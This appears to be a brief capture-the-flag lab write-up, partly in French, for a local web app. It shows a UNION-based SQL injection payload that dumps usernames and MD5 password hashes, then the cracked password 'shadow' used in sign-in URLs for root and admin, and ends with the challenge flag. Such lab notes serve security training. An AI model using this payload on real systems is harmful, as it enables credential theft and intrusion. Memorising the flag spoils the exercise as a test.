http://127.0.0.1:8000/index.php?page=searchimg


1 OR 1=1 UNION select username, password FROM Member_Brute_Force.db_default 

username : root
password: 3bf1114a986ba87ed28fc1b5884fc2f8

username : admin
password: 3bf1114a986ba87ed28fc1b5884fc2f8


→ decrypt md5 → shadow

http://127.0.0.1:8000/index.php?page=signin&username=root&password=shadow&Login=Login#

fonctionne aussi pour admin: 
http://127.0.0.1:8000/index.php?page=signin&username=admin&password=shadow&Login=Login#

flag: b3a6e43ddf8b4bbb4125e5e7d23040433827759d4de1c04ea63907479a80a6b2



